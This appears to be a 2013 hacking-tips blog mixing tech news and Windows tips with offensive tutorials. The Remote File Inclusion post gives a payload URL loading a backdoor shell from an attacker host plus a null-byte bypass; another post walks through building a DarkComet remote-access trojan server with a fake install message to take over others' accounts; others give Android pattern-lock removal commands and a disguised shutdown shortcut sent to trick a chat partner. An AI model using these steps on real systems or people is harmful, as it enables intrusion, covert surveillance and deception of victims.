Tuesday, 17 December 2013

41) Testing Remote File Inclusion vulnerability in web applications

Remote file inclusion(RFI) is a critical vulnerability caused by insufficient validation of user input passed to the web application.  The RFI vulnerability allows attackers to load remotely hosted malicious file such as a backdoor shell.


Vulnerable Code
Let us say a webpage called "RFI.php" that loads a code from external file using 'filename' parameter.
 

In the above screenshot, the RFI.php file loads the code from 'news.php'.

HTTP request:
http://site/RFI.php?filename=news.php

Let us check the PHP code of RFI.php :
code(RFI.php):

   <?php
        include($_GET['filename']);
   ?>
The include() function gets the all code/text from the specified file(news.php) and copies it into the current file(rfi.php).

Content of news.php file

As you can see the developer didn't validate the 'filename' and passed it directly to the 'include' function.  It results in Remote File inclusion vulnerability. 


Testing the Vulnerability:
Let us test whether the application is vulnerable to Remote File Inclusion by passing "http://www.google.com" as filename parameter to the webpage.

HTTP request:
http://site/RFI.php?filename=http://www.google.com


Hurrah, it successfully loaded the content from the Google.com :) It means the page is vulnerable to RFI :D

Exploiting the vulnerability:
A hacker with malicious intent can load a backdoor shell.  The backdoor shell allows the hacker to compromise the entire web server.

For Example:
http://site/RFI.php?filename=http://attacker/shell.txt



Using this shell, now an attacker is able to do anything in the server.  For instance, he can delete index.php file.

Example 2:

In most of the web applications, the filename is passed as parameter without the extension(.php).

For example:
http://site/RFI.php?filename=news


------------------------
Code of RFI.php:
------------------------
<?php
        include($_GET['filename'].".php");
 ?>
As you can see in the above code, the ".php" extension is appended to the filename in the PHP code.   

So, if we pass "shell.txt", then the filename will become "shell.txt.php", results in an error.



To avoid this error, you can use Null Byte.  Null byte() indicates the end of the string. The strings following the null byte will be ignored.

We can enter the null byte at the end of our filename to ignore the ".php" string.

http://site/RFI.php?filename=http://attacker/shell.txt

---------
If You would like to test how a remote file inclusion attack works, you can just download our Vulnerable app "BTS Pentesting Lab" from here:
http://code.google.com/p/bts-pentesting-lab/

In case, you would like to see the real world examples, Here is list of Vulnerability reports:
Exploit-Db

 How to Prevent Remote File Inclusion vulnerability
  • Disable the 'register_globals' and 'allow_url_fopen' and 'allow_url_include' in PHP.ini file.  In latest version of PHP, they have been turned off :) so no need to worry now.
  •  Validate Users' Input.

Monday, 16 December 2013

40) Transfer data over 100GB from one place to another via email Using Split Tool

Transfer data over 100GB from one place to another via email, pendrive, ­other storage device. If you want to transfer a file from
one place to another, but don’t have enough space, in your pen drive or any other external device or you want to send large data via email, it is better to split the file into pieces and transfer the small files one by one and merge them later.
HJSplit
is the best freeware tool available to Windows users for this purpose. It supports file sizes of over 100 GB. In addition to that, this software doesn’t require any installation to use. Just download the zip file, extract the HJSplit.exe on your computer and doubleclick to run it. Here’s how you can split and then rejoin those pieces and
end up with a fully functional file.
Spliting a file
 
1. Double click on the HJSplit.exe file to run it. Now click on the Split
button.
 
2. click on the Input File button to choose the file you want to split.
 
3. Click on the Output button to choose the location for the output
files.
 
4. Then click on Start button to start the process.
 
NOTE:: The process of splitting the file will start. A progress bar will appear to show the status. The time
it takes will depend on the size of the file you are splitting.
Merge files
1. Run the tool again

39) Free Data Recovery Tools

1. Recuva

It is a free data recovery software from piriform, the same team that gave us ccleaner and defragler.

It is simple and easy to use.

Capable of recovering files deleted from recycle bins, memory cards and other portable device.

It also has a deep scan mode where your chances of getting the data back is even better.

Regarding compatibility, it runs good upto windows 7 32-bit. Haven’t tested it with windows 8 yet.

It is also available as a portable version i.e you can run it directly from the downloaded file which is definitely an advantage!

2. Pandora Recovery


It is also capable of recovering permanently deleted files from your hard drives.

Has a preview mode where you can view the recoverable images and texts from your harddrives.

There is an option called as surface scan where you can search for files from a corrupted or reformatted partitions.

There is also a helpful wizard which can guide you through the recovery processes.

It is compatible up to windows 7

3. Tokiwa Data Recovery

It Is the most easy to use data recovery tool currently available.

It has a simple interface with a few but powerful options.

A scan button to scan for recoverable files.

You can also search for a specific file by typing the file name in the search box.

There is also a wipe button which can permanently delete the recoverable files from any partition except the drive where your OS is installed.

4. Free UnDelete

It is just another simple tool for data recovery.

Supports various file systems such as NTFS 1.0, NTFS 2.0, FAT12, FAT16 and FAT32.

Available both in portable as well as installer versions.

5. Avira UnErase Personal

Avira UnErase personal is a bit older than the other tools listed here but still works good.

It supports file systems such as NTFS 1.0, NTFS 2.0, FAT12, FAT16 and FAT32 like others.

It also supports dynamic disks, software and hardware RAID, volume sets and stripe sets which is useful for advanced users.

The interface is less graphical and consumes less memory which is definitely good for low configuration systems.

It is also available as portable version.

Sunday, 15 December 2013

38) Ping of Death


Ping of Death

The ping of death attack is one of the oldest network attacks. The principle of ping of death simply involves creating an IP datagram whose total size exceeds the maximum authorized size (65,536 bytes).

When such a packet is sent to a system with a vulnerable TCP/IP stack, it will cause the system to crash.
The Ping of Death attack relied on a bug in the Berkeley TCP/IP stack which also existed on most systems which copied the Berkeley network code. The ping of death was simply sending ping packets.

The maximum allowable IP packet size is 65,535 bytes, including the packet header, which is typically 20 bytes long. An ICMP echo request is an IP packet with a pseudo header, which is 8 bytes long. Therefore, the maximum allowable size of the data area of an ICMP echo request is 65,507 bytes (65,535 - 20 - 8 = 65,507).

However, many ping implementations allow the user to specify a packet size larger than 65,507 bytes. A grossly oversized ICMP packet can trigger a range of adverse system reactions such as denial of service (DoS), crashing, freezing, and rebooting.

The ping of death attack, or PoD, can cripple a network based on a flaw in the TCP/IP system. Since the maximum size for a packet is 65,535 bytes. If one were to send a packet larger than that, the receiving computer would ultimately crash from confusion.

Sending a ping of this size is against the rules of the TCP/IP protocol, but hackers can bypass this by cleverly sending the packets in fragments. When the fragments are assembled on the receiving computer, the overall packet size is too great. This will cause a buffer overflow and crash the device.

37) What is #XSS ?

we got some message about XSS -- i.e. Cross Site Scripting. so
here is some description about it. I will also write an article on our blog about it.


What is #XSS ?

So what exactly XSS is..? XSS stands for Cross Site Scripting. You can also call it is CSS but this will misinterpret a web designer as Cascading Style Sheets, so let it be XSS. In this method the attacker tries to inject a malicious (usually javascript). The attacker then can steal admin-cookies, can setup XSS worm, XSS shell's, etc. XSS are of 2 type's traditionally and other one is DOM's based.

************Non-Persistent

Non-presistent is also known as Reflected XSS. It gets reflected as the name suggest. It gets reflected on the page but does not get injected in the page. While doing such attack the should hide his script form his victim.

************Persistent

Persistent is also known as Stored XSS. In this type of XSS as the name suggest the malicious code get stored inside the page. So when ever a victim click's on the page, the script get activated and runs the malicious code.

************DOM Based

DOM stands for Document-Object Method. In this type of vulnerability occurs while content processing of the document.

If any body have any problems then comment here ... i will reply to you.

Saturday, 14 December 2013

36) HACK A ACCOUNT USING REMOTE ADMINISTRATION TOOL [RAT]

A remote administration tool (or RAT) is a program that allows certain persons to connect to
and manage remote computers in the Internet or across a local network. A remote
administration tool is based on the server and client technology. The server part runs on a
controlled computer and receives commands from the client, which is installed on other remote
host. A remote administration tool works in background and hides from the user. The person
who controls it can monitor user’s activity, manage files, install additional software, control the
entire system including any present application or hardware device, modify essential system
settings, turn off or restart a computer



Go on http://www.no-ip.com/, Create your Account and click on "Download".


Now Click on "Windows"

Now Click on "Download 3.0.4"

Now you must install No-DUP 3.0, Click on "Next"


Now, choose "Install Location" and click on "Next"

Now choose "Start Menu Folder" and Click on "Install"

Setup was completed successfully, click on "Close"

Now, go on http://www.no-ip.com/ and click on "Login" then type your Email and your Password.

Now, click on "Add a Host"

Choose a "Hostname", enter your IP address and click on "Create Host".

Done, Now open No-IP DUC 3.0 and enter your email and your password and click on "OK"

Now, Select your "HOST" and click on "Save".

Done, you can close No-IP DUC 3.0

Download DarkComet v4.0 here and run DarkComet.

Click on [+], Choose your port (I advice 1604) and click on "Listen".

Now click on "Settings".

Click on "Mo-IP Updater" and type your No-IP informations.

Now you will edit your server, click on "Edit Server" and click on "Network Settings", enter your

informations and click on "Test network".

Click on "Module Startup" and choose your settings.

Click on "Install Message" and choose your fake message.

Now click on "Module Shield" and choose your settings.

Now click on "Build Module" and click on "Build Server".

See the Results

35) WORLDS TOP 10 HACKERS !!

World Top 10 Hackers

Hackers in Hollywood tend to be portrayed in extremes: They're either modern-day equivalents of James Bond or anti-social yet tech-savvy teenagers looking for ways to amuse themselves at the expense of other computer users. The truth is, hackers are an assortment of IT-knowledgeable individuals who are both responsible for billions of dollars of losses yearly and the unstoppable evolution of the worldwide web. As such, this article will tackle the good, the bad, and the geeky hackers of modern-day computing.

1. Shawn Fanning: This hacker has helped a lot in revolutionizing (that is, enacting actual, irrefutable change) the music industry, particularly in the domain of music distribution. Together with the help of Shaun Parker and Jordan Ritter, the three visionaries set out to launch Napster—a P2P application that ultimately popularized the free exchange of music files via the Internet.

2. Robert Morris: He is the inventor of first Internet-based worm ever made. His namesake exploited both fingerd and sendmail vulnerabilities in order to induce buffer overflow. After serving time for his supposed cyber crimes, he made a profitable startup that was bought by Yahoo for a considerable sum and became the co-founder of ViaWeb along with Paul Graham.

3. VallaH: This hacker was the one responsible for the first smart DOS attack, ping-of-death, and jolt.c, which enabled him to entertain script kiddies across cyberspace and bring entire multinational companies down on their knees.

4. Gordon Lyon: More renowned for the nom de net of "Fyodor", Lyon is credited as the creator of Nmap (the hacker's first-ever tool that has made a big enough impact in pop culture to be included in movies like "The Bourne Ultimatum" and "The Matrix"), the founder of insecure.org, and the pioneer of service fingerprinting.

5. Kevin Mitnick: He's arguably the most famous real-life black hat hacker because of all the media and press attention he has gotten over the last decade. For years, he had been imprisoned without charge by the government before he was sentenced to three years and ten months with consideration of the time he'd already spent in jail. He now runs his own IT security company at present.

6. The Mentor: This anonymous, cultish hacker leader was the author of the Phrack-magazine-published Hacker Manifesto. He served as an inspiration to a generation of children worldwide who wanted to become a hacker just like him.

7. Karl Koch: This German hacker from the 1980s was far more well-known for his controversial antics (i.e., his paranoia over the Illuminati, his obsession with the number 23, and his cocaine addiction) than his involvement in a computer espionage incident during the Cold War.

8. Richard Jones: A young Australian hacker (also known by the code name of Electron) who spread disorder across the Internet with nothing more than a modem and his technical know-how. After being arrested by Australian Federal Police in 1990 and serving time in jail, he eventually became a security consultant and researcher.

9. Kevin Poulsen: He's a former black hat hacker who's now the senior editor of Wired News. He once used his hacking skills to "phreak" his way into winning an LA radio contest and getting a brand new Porsche, but he was ultimately caught and arrested for his actions.

10. Adrian Lamo: This gray hat hacker demonstrated to everyone across the globe that it's possible to take down large websites by just manipulating URLs. He is now an award-winning journalist.

34) How To Change BackGround Screen Of Windows 7

image
Windows 7 makes it possible to change the welcome screen that appears when you start your computer without any third-party software, but this setting is well hidden. You can set any image you like as your background.
This setting is intended for original equipment manufacturers (OEMs) to customize their systems, but there’s nothing stopping you from using it yourself. All you have to do is change a single registry value and put an image file in the correct location.

Enabling Custom Backgrounds

This feature is disabled by default, so you’ll have to enable it from the Registry Editor. You can also use the Group Policy Editor if you have a Professional version of Windows – scroll down a bit for the Group Policy Editor method.
Launch the Registry Editor by typing regedit into the search box in the Start menu and pressing Enter.
In the Registry Editor, navigate to the following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background
You’ll see an DWORD value named OEMBackground. If you don’t see it, right-click in the right pane, point to the New submenu and create a new DWORD value with this name.
Double-click the OEMBackground value and set its value to 1.
Note that selecting a new theme in the Appearance and Personalization window will “unset” this registry value. Selecting a theme will change the value of the key to the value stored in the theme’s .ini file, which is probably 0 – if you change your theme, you’ll have to perform this registry tweak again.
Changing the setting in group policy will allow it to persist even when you change your theme, but the Group Policy Editor is only available in Professional editions of Windows.
If you have access to the Group Policy Editor, launch gpedit.msc from the Start menu.
Navigate to the following section in the Group Policy Editor window:
Computer Configuration\Administrative Templates\System\Logon
You’ll find a setting named “Always use custom login background.” Double-click it and set it to Enabled.

Setting An Image

Your image file must be less than 256 KB in size. It’s also a good idea to use an image file that matches the resolution of your monitor, so it won’t look stretched.
Windows looks for the custom logon screen background image in the following directory:
C:\Windows\System32\oobe\info\backgrounds
By default, the info and backgrounds folders don’t exist. Navigate to the C:\Windows\System32\oobe folder and create them yourself by right-clicking inside the folder, pointing to New, and selecting New Folder.
Copy your desired background image to the backgrounds folder and name it backgroundDefault.jpg.
(I can see the inevitable question coming in the comments, so if you like this wallpaper image, you can get it here.)
The change will take effect immediately – no system reboot required. The first time you log out or lock your screen (try the WinKey-L keyboard shortcut), you’ll see your new background.

Third-Party Tools

You don’t have to do this by hand. There are a variety of third-party tools that automate this process for you, like Windows Logon Background Changer, which we’ve covered in the past. Windows Logon Background Changer and other utilities just change this registry value and put the image file in the correct location for you.

To get the default logon screen back, just delete the backgroundDefault.jpg file. Windows will use the default background if no custom background image is available

Tuesday, 3 December 2013

33) Crack Or Unlock Android Pattern From Android Device

List Of Requirements Things:-
1.     Linux distro
2.     Android phone
3.     USB cable
4.     ADB


Step-1

1.Connect Your Android Device With your PC using USB cable.

Step-2:- Installing ADB over terminal

1.Boot into any Linux distro you have.
2.Open up terminal and type :

Quote:sudo apt-get install android-tools-adb

 Above Command will install ADB.

Step-3:- Disabling pattern unlock over terminal

1.Open up terminal again and type :

Quote:adb devices
adb shell
cd data/system
su
rm *.key


After that Disconnect your Android Device and REBOOT Your Android Device.

Wednesday, 3 July 2013

32) GOOGLE LANGUAGE INPUT TOOLS


Type anywhere in your language

Google Input Tools for Windows is an input method editor which allows users to enter text in any of the supported languages using a Latin (English / QWERTY) keyboard. Users can type a word the way it sounds using Latin characters and Google Input Tools for Windows will convert the word to its native script. Available input tools include transliteration, IME, and on-screen keyboards.
Google Input Tools for Windows is currently available for 22 different languages: Amharic, Arabic, Bengali, Persian, Greek, Gujarati, Hebrew, Hindi, Kannada, Malayalam, Marathi, Nepali, Oriya, Punjabi, Russian, Sanskrit, Serbian, Sinhala, Tamil, Telugu, Tigrinya and Urdu.

Features

  • Offline Support

    No internet connection is required.
  • Word Completions

    Dictionary-based word completions for prefixes.
  • Personalized Choices

    Remembers user corrections along with macro and canonical support.
  • Easy Keyboard

    Dictionary-enabled keyboard to enter rare and complex words.
  • Quick Search

    Single-click web search for highlighted words.

Cool Customizations

Customize candidate window size, display fonts and more.

How To Download It:-
Go to google And Search Google Input Tools for Windows And Click Any Perfect reasult
OR other way click hear

Sunday, 3 March 2013

31) How To Lock Computer With USB Flash Drive



Hello to all dailyhackingtips readers . Today i am learn you how can you lock ur own pc with usb flash drive .Guys this tips will not work on all versions on windows including both windows 32 bit and 64 bit.


 so guys follow the steps for do this .. 
1.First you Download predator software .. Click here 
2.Predator software will get launched automatically after completing installation if not you can run it fromStart/Programs/Predator

3. Now Insert your Usb. You will get a message to define your new password (This process will not format your pendrive and your pendrive data will not be affected by this at all)


4.  Now Click on Ok and Then Enter your your new password in next dialog box

5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list

6. Finally click on Create Key button and then on OK button

After this the software will automatically exit.Now restart ur program by clicking the icon on desktop.

Predator will take few seconds for initialization. Once the icon in the taskbar turns green then your software has initialized itself. 

Guys i hope u really enjoying it ..

If you have any question or suggestions then give me comments ..







30) How To Disable Error Report In Windows xp



   
Hey to all friends today i am going to post about how can you disable error report in windows xp and vista.
Microsoft’s Error Reporting in windows sometimes is disturbing, most of us don’t want to send that error report because it’s of no use.


There’s an easy way to disable Microsoft error report in windows.
Disable Microsoft Error report in Windows XP :
 
1) Open Control Panel (Start > Control Panel)
2) Open the Problem Reports & Solutions applet Under advanced options and disable error reporting.

Disable Microsoft Error report in Windows Vista :
1) Right click on my computer (Desktop) and click properties
2) Click the Advanced Tab
3) You’ll see a “Error reporting” button at the bottom, click it
4) Select Disable Error Reporting.

And That's It Now you’re done….!
 
 

29) How To Format An Unformatable Pen Drive Using Command Prompt

Hi to all guys . now i am going to share a very useful tips . as sometime we are unable in formatting a pen drives.as it may be affected by virus or any other problem . so we can not format .so today am going to share a very useful trick that how to fomat an unfromatable pern drives using dos command.


Follow The Given Below Steps for do this.

1. First insert your pen drive in any usb port.

2. Now go to run.

3.  Type this command format h: And the hit enter.

4.when you will hit enter then it will ask you that you want to format or not. Y or N !!! Hit Y and press enter
That's it..
Keep Visiting..    

 

Friday, 1 March 2013

28) Books on Google Play now available in India


New Delhi: Google has now added books to its Google Play store, for usersin India. Books on Google Play include thousands of Indian titles, from new releases to classics.
The Play Store now has two sections - Apps and Books. Selecting Apps will take you to the old app store, where you can download apps and games, while selecting Books will take you to Google Play Books, where you can browse through and download books.
Your library is at your fingertips no matter where you are. With Google Play you can read on the device of your choice. And with your books in the cloud you can read on the web, a phone, or a tablet and pick up right where you left off.
Users will be able to discover, purchase and read books on Android phones and tablets, your computer - you can purchase and read books on the Google Play store and read in your web browser. Users can also read books on iPhones and iPads i.e., in the Google Play Books app.
The Play Books app was also updated today for performance and UI improvements. There is a drop-down menu in the library that allows you to filter books by type.
(With inputs from Tech2)

27) Apple TV coming to India next week, to be priced at Rs 7,900

Mumbai: Apple TV is going to make its way to India very soon. Our sources have revealed that the device is set to hit Indian stores sometime next week. The device will be available for Rs 7,900 through official channels, but Tech2.com's sources in the grey market have told us that the Apple TV is available right now for a considerably cheaper cost of Rs 6,600.
The "launch" of Apple TV was revealed earlier this month through Apple's India website. It reflected the availability of the device and listed its various functions, and also put up images of India-centric content. The Apple TV is essentially a media streamer that ties in to the company's iTunes store or your other iDevices and lets you stream and share content to your HDTV.
The device needs to be connected to your HDTV through HDMI, and it can pull content from other Apple devices when connected to the same network. If you have a good collection of films and music, you can instantly share it with other viewers over the Apple TV connection. You can also purchase or rent new content from the recently-launched iTunes store.
Apple TV coming to India next week, to be priced at Rs 7,900

Saturday, 23 February 2013

26 ) Google unveils expensive high-resolution Chromebook Pixel touchscreen laptops

San Francisco: Google is adding a new and more expensive touch to its line of Chrome laptops in an attempt to outshine personal computers running on software made by rivals Microsoft and Apple.
The Chromebook Pixel unveiled Thursday includes a nearly 13-inch display screen that responds to the touch or swipe of a finger. That duplicates a key feature in Microsoft's Windows 8, a dramatic makeover of the world's leading operating system for PCs.
The Pixel's high-resolution screen displays 239 pixels per inch, slightly more than Apple Inc.'s MacBooks with high-resolution Retina displays. A MacBook Pro with a screen that measures 13.1 inches diagonally can handle 227 pixels per inch, while the 15.4-inch model is at 220 pixels per inch.
Google unveils expensive high-resolution Chromebook Pixel touchscreen laptops
"This is the future: high-resolution screens and touch," said Sundar Pichai, a senior vice president who oversees Google's Chrome Web browser and operating system.
Google designed and built the Pixel for "power users" - a fastidious and generally more affluent segment of the PC market willing to pay more for machines equipped with compelling features and components not found in cheaper laptops.
The strategy is a departure for Google, which had positioned Chromebooks based on its Chrome operating system as affordable options for homes and offices looking for a quick and easy way to connect to the Web. Google has been partnering with PC makers to make Chromebooks over the past two years. Among them: Acer makes a bare-bones Chromebook for just $199, while Samsung Electronics sells one for $249.
The Pixel, which Google is building without a partner, will cost $1,299 for a Wi-Fi only model with 32 gigabytes of flash storage. A 64-gigabyte machine that can connect on both Wi-Fi and a 4G LTE cellular network will cost $1,499. That's the same price as the cheapest MacBook Pro with a comparable screen, though the Apple laptop comes with 128 gigabytes of storage.
Apple does have a cheaper, lighter laptop, the MacBook Air. A 13-inch model with 128 gigabytes of storage starts at $1,199. It weighs less than 3 pounds and doesn't have a high-resolution screen. The Pixel has the high-resolution screen and weighs 3.35 pounds. The 13-inch high-resolution MacBook Pro weighs 3.57 pounds.
Google believes Pixel is a better value than the Air, given its higher-resolution screen with touch controls. Google is also throwing in 1 terabytes of free online storage in its data centers for three years - a benefit that Pichai estimated would cost $500 to $600.
The Pixel "will stand up very, very well to the MacBook Air," Pichai said. "The goal here is to push the boundaries to deliver the best laptop at the best possible price."
Though its popular iPad has a touch screen, Apple has shunned touch-screen laptops. Apple figures that because people use laptops with the screen in front of them, rather than in their hands or laps, it's not a pleasant experience to constantly have to reach out to touch the screen.
Microsoft, on the other hand, considers touch screens to be central to all computing environments. Windows 8 was designed to make desktop and laptop computers work more like tablet computers. Computers with touch-screen monitors can respond to touch along with old-style mouse and keyboard commands.
Google's online Play store will begin selling the Pixel in the US and UK from Thursday, with BestBuy.com expected to take orders on Friday. A hands-on experience with the Pixels also will be available beginning Friday in 10 of Best Buy's retail stores in California, Minnesota, Washington state, Virginia and New York.
Pichai declined to say how many of the lower-priced Chromebooks have been sold, but said the models have ranked as the most popular laptop sold by Amazon.com for the past four months.
The free online storage is being included with the Pixel to overcome the laptop's lack of a hard drive. Like other Chromebooks, the Pixel functions like a terminal dependent on an Internet connection to get to information and applications stored in large data centers run by Google or other technology providers.
Spurred by the growing popularity of smartphones and tablet computers, Google is betting more people will prefer having data, photos and video stored in remote data centers instead of individual hard drives so the content can be accessed from any Internet-connected device.
Google's expansion into the high-end of the laptop market immerses the Internet search and advertising company more deeply into the business designing and making gadgets.
The company is already a major player in the mobile device market through its Android software. To help promote Android, Google also has designed a line of smartphones and tablets under the Nexus brand. The company also owns smartphone maker Motorola Mobility, which it bought for $12.4 billion last year.
Google's deepening involvement in hardware has ignited speculation that the company might eventually open its own chain of stores to sell its products, just as Apple and Microsoft already do. Pichai didn't address that in a response to a question on that topic at Thursday's event.
Apple and Microsoft already have been hurt by the increased competition from Google. Most smartphones and tablets running on Google's free Android software cost less than Apple's iPhone and iPad, helping to siphon sales away from those devices. Sales of PCs running on Windows also have been sagging during the past year, partly because consumers are relying more on Android devices.
Google says it expects to make a small profit on each Pixel sold, but the company figures to make more money from the online traffic delivered from the machines. Like other Chromebooks, the Pixel is set up to automatically use all of Google's services, including its search engine, Gmail and YouTube video site.
 http://www.youtube.com/watch?v=j-XTpdDDXiU&feature=player_embedded

25) First Facebook, then Apple and now Microsoft's computers hacked

Seattle: Microsoft said on Friday a small number of its computers, including some in its Mac software business unit, were infected with malware, but there was no evidence of customer data being affected and it is continuing its investigation.
The world's largest software company said the security intrusion was "similar" to recent ones reported by Apple and Facebook.
The incident, reported on one of the company's public blogs happened "recently", but Microsoft said it chose not to make any statement publicly while it gathered information about the attack.
First Facebook, then Apple and now Microsoft's computers hacked
"This type of cyberattack is no surprise to Microsoft and other companies that must grapple with determined and persistent adversaries," said Matt Thomlinson, general manager of Trustworthy Computing Security at Microsoft, in the company's blog post.
Over the past week or so, both Apple and Facebook said computers used by employees were attacked after visiting a software developer website infected with malicious software.
The attacks come at a time of broader concern about computer security.
Newspaper websites, including those of The New York Times, The Washington Post and The Wall Street Journal, have been infiltrated recently. Earlier this month US President Barack Obama issued an executive order seeking better protection of the country's critical infrastructure from cyber attacks.

Friday, 22 February 2013

24) Charge your mobile phone with hot water

New Delhi: While researchers are busy finding newer sources of energy and ways of harvesting it, Ryan Johnstone, an independent inventor based in Nairobi, Kenya, has invented a solution that could help mobile phone users charge their devices with just the power of hot water. Ryan has developed the Bottle Charger, as he likes to call it, an apparatus that utilises the power of hot water to run a small turbine, which in turn produces electric current potent enough to charge small devices.
Explaining its working, Ryan said to The Mobile Indian, "The Bottle Charger works like a small wind turbine. Instead of natural wind currents, the pressurised air is created by expansion and contraction due to the presence and absence of hot water."
This change in air pressure is then used to run a small turbine that sits inside the apparatus and generates electricity for charging mobile devices. The inventor claims that the Bottle Charger creates electricity as long as you have access to hot water of around 100 degrees Celsius. With this the Bottle Charger enables users to charge smaller electronic devices such as mobile phones, MP3 players and so on for 15-30 minutes depending on surrounding temperatures.

The Bottle Charger involves using a 20 litre water jar along with a BUCT (Blackbeard Unidirectional Constant Turbine) module to create electricity. The quality of water does not cause any difference; it can be normal tap water as well.
The project is in its very nascent stage but holds promise. The inventor has taken help of crowd funding website Indiegogo to raise money to make the device better and smaller.
 For Video : http://www.youtube.com/watch?v=wPZkNa9PTJE&feature=player_embedded

Monday, 18 February 2013

23) Optimus G Pro: LG to launch its first full HD smartphone this week

Seoul: LG Electronics Inc. said Monday its new smartphone with a full high-definition screen will go on sale in South Korea this week before hitting shelves in Japan in April.
The Optimus G Pro smartphone features a 5.5-inch screen that packs over 2 million pixels, or twice as many as smartphones with HD screens. The new Android-powered phone sports other upgrades including a camera that can shoot full HD videos and photographs.
The South Korean company, Sony Corp., HTC Corp. and other phone manufacturers are trying to make high-resolution screens a key feature in their new smartphones this year.
Optimus G Pro: LG to launch its first full HD smartphone this week
The Full HD IPS display on the Optimus G Pro - developed in partnership with LG Display - delivers 1920 x 1080 pixels at 400ppi.
Full HD screens are more common in televisions but smartphone makers began to embrace them this year amid cutthroat competition. One in every two smartphones is made by Samsung Electronics Co. or Apple Inc., creating a hardscrabble fight among the second-tier of makers.
The Optimus G Pro also comes with advanced UX features developed specifically for the device, such as Dual Recording and Virtual Reality (VR) Panorama. Dual Recording allows users to capture video with both the front and rear cameras simultaneously for a unique picture-in-picture experience. And VR Panorama allows shots of entire horizontal and vertical environments for a full 360 degree view.
LG executives said their current goal is elevating the reputation of the Optimus brand after turning around the company's mobile communications business following years of losses.
The Optimus G Pro is available at 968,000 won ($894) without in South Korea without a mobile carrier contract.
The model will be on display at the annual mobile fair in Barcelona, Spain kicking off next week.
Once the world's No. 3 mobile phone maker, LG was the fifth-largest mobile phone maker by shipments in 2012 after Samsung, Nokia Corp., Apple and ZTE Corp., according to market research firm IDC.
Optimus G Pro Key Specifications:
- Chipset: 1.7GHz Quad-Core Qualcomm® Snapdragon™ 600 Processor
- RAM: 2GB DDR
- Memory: 32GB / microSD (up to 32GB)
- Display: 5.5-inch Full HD (1920 x 1080 pixels / 400ppi)
- Camera: Rear 13.0MP with LED Flash / Front 2.1MP
- OS: Android 4.1.2 Jelly Bean
- Battery: 3,140mAh (removable / wireless charging capable)
- Size: 150.2 x 76.1 x 9.4mm
With inputs from Associated Press

Sunday, 17 February 2013

22) Transparent smartphone to debut by the end of 2013

London: In a revolutionary development, a Taiwanese company claims to have developed a gen-next transparent mobile phone which it says will be in the market by the year end. The company, Polytron Technologies, has already begun marketing a transparent multi-touch phone. Its prototype uses a 'Switchable Glass' technology.
That is a conductive Organic light-emitting diode (OLED) using liquid crystal molecules to display images, the 'Daily Mail' reported.
When the phone is in off mode, the molecules align to form a milky composition, but when switched on they re-align to form text, icons, and other images. Electric current is carried through transparent wires. "It will happen near the end of 2013. Trust me," said Polytron general manager Sam Yu.
Transparent smartphone to debut by the end of 2013
The device still contains some parts that are not transparent, including a SD card and SIM card. The microphone, camera, and batteries are also visible, and will be hidden behind a dark glass cover when the model goes into production.
The company, according to Yu, will develop a smaller lithium ion battery that would be much less noticeable. When complete, the phone will have a dual-sided multi-touch display in front and back.
The prototype phone has yet to feature any software or operating system, the report said. A Japanese company recently used a transparent liquid crystal display (LCD) in its wristwatch but had trouble adding hardware to the smaller frame.
"The challenge of using a transparent display in a wristwatch, and I suppose other wearable technology, is that you need to store the batteries somewhere else (usually they are stored behind the LCD panel)," Tokyoflash marketing manager Paul Cooper said.
It remains to be seen whether the phone's transparency by itself will attract buyers, as the prototype does not offer significantly different functions than most smartphones.
"Display quality is paramount," Avi Greengart, research director at Current Analysis, told The Verge.
"If the display quality is not up to par with the best of today's AMOLED and LCD screens, a phone using it won't sell even for its novelty value," said Greengart.
http://www.youtube.com/watch?v=tkhWXspmiYE&feature=player_embedded

Saturday, 16 February 2013

21) CMD Prompt here, add to folder context menu windows xp


 add the open cmd prompt to folder context menus
also drives and My Computer

copy what's in the code area to notepad and save as cmd here.reg

CODE

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Drive\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Drive\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_CLASSES_ROOT\Directory\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd]
@="Command Prompt"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

Friday, 15 February 2013

20 ) CODE FOR C

1.for rings a bell -->    '\a'

Escape Sequence     Meaning

    \a          Alarm (the terminal's bell)
    \b          Backspace
    \f           Form feed (for the printer)
    \n          Newline (carriage return and line feed)
    \r          Carriage return
    \t          Tab
    \v          Vertical tab
    \\          Backslash (\)
    \?         Question mark
    \'          Single quotation mark
    \"          Double quotation mark
    \ooo     Octal number
    \xhh      Hexadecimal number
    \0         Null zero (or binary zero)


Sunday, 10 February 2013

19) How to Shutdown Someone's computer while Chatting

Try at your own risk. I am not responsible for your own deeds. For educational purpose only.

How to Shutdown Someone's computer while Chatting


It can be the coolest thing to do with you friends while chatting. There is no Limitation on the messenger but the messenger should provide the file transfer service to send the following Program.

STEP 1:
Right-click on any folder goto -> New -> Shortcut.

STEP 2:
Type in shortcut %windir%\system32\shutdown.exe -s -t 120 -c "The 31HA0w Virus Have invaded your Computer. And it is deleting your files"

STEP 3:
Right-click the shortcut goto -> Properties -> Choose Icon. Now choose any icon of your choice.

STEP 4:
Compress the file in ZIP and sent it to your friend while chatting and ask him to run it

WARNING: You can be punched on Nose by your FRIEND.
HAHAHA